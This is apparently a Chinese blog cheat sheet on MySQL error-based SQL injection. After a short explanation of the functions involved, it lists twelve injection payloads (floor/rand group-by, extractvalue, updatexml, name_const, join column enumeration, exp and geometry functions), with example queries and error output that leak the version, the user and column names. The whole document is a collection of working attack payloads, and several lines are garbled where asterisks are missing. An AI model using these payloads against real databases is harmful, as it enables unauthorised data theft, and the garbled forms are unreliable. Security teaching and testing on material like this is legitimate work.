利用数据库的bug进行利用,看报错信息,报错的信息会出现我们想要的信息
讲解报错注入原理非常详细的一篇博客https://blog.csdn.net/he_and/article/details/80455884
concat()这个函数用来将两个字符串连接为一个字符串
floor函数的作用是返回小于等于该值的最大整数,也可以理解为向下取整,只保留整数部分。
.rand()函数可以用来生成0或1,但是rand(0)和rand()还是有本质区别的,rand(0)相当于给rand()函数传递了一个参数,然后rand()函数会根据0这个参数进行随机数成成。rand()生成的数字是完全随机的,而rand(0)是有规律的生成
extractvalue() :对XML文档进行查询的函数
updatexml()函数与extractvalue()类似,是更新xml文档的函数。
只要是count(),rand,group by三个连用就会造成这种报错
left(rand(),3)== 不一定报错
floor(rand(0)2)== 一定报错
round(x,d) //x指要处理的数,d是指保留几位小数
Concat()//字符串拼接
select count(),(concat(floor(rand(0)*2),(select database())))xx from admin group by xx;
1.通过floor报错,注入语句如下:
and (select 1 from (select count(*),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);
例:select User from user where User=root and (select 1 from (select count(),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
1062 - Duplicate entry ‘5.5.531’ for key ‘group_key’
2.通过Extractvalue报错,注入语句如下:
and extractvalue(1,concat(0x5c,(select table_name from information_schema.tables limit 1)));
例:select User from user where User=root and extractvalue(1,concat(0x5c,(select table_name from information_schema.tables limit 1)));
1054 - Unknown column ‘root’ in ‘where clause’
3.通过UpdateXml报错,注入语句如下:
and 1=(updatexml(1,concat(0x3a,(select user())),1));
例:select User from user where User=root and 1=(updatexml(1,concat(0x3a,(select user())),1));
1054 - Unknown column ‘root’ in ‘where clause’
4.通过NAME_CONST报错,注入语句如下:
and exists(select * from (select * from(select name_const(version(),0))a join (select name_const(version(),0))b)c);
例:select User from user where 1=1 and exists(select * from (select * from(select name_const(version(),0))a join (select name_const(version(),0))b)c);
1060 - Duplicate column name ‘5.5.53’
5.通过join报错爆字段,注入语句如下:(在知道数据库跟表名的情况下使用才可以爆字段)
select * from (select * from 表名 a join 表名 b using(已知的字段,已知的字段))c);
例:select User from user where User=root and root=(select * from (select * from user a join user b )c);
1060 - Duplicate column name 'Host
select User from user where User=root and root=(select * from (select * from user a join user b using(Host))c);
1060 - Duplicate column name ‘User’
select User from user where User=root and root=(select * from (select * from user a join user b using(Host,User))c);
1060 - Duplicate column name ‘Password’
6.通过exp报错,注入语句如下:
and exp(~(select * from (select user())a));
7.通过GeometryCollection()报错,注入语句如下:
and geometrycollection((select * from (select * from (select user())a)b));
8.通过polygon()报错,注入语句如下:
and polygon((select * from(select * from(select user())a)b));
9.通过multipoint()报错,注入语句如下:
and multipoint((select * from(select * from(select user())a)b));
10.通过multilinestring()报错,注入语句如下:
and multilinestring((select * from (select * from (select user())a )b))
11.通过mulitipolygon()报错,注入语句如下:
and multipolygon((select * from (select * from (select user())a)b));
12.通过multilinestring()报错,注入语句如下:
and multilinestring((select * from(select * from (select user())a)b));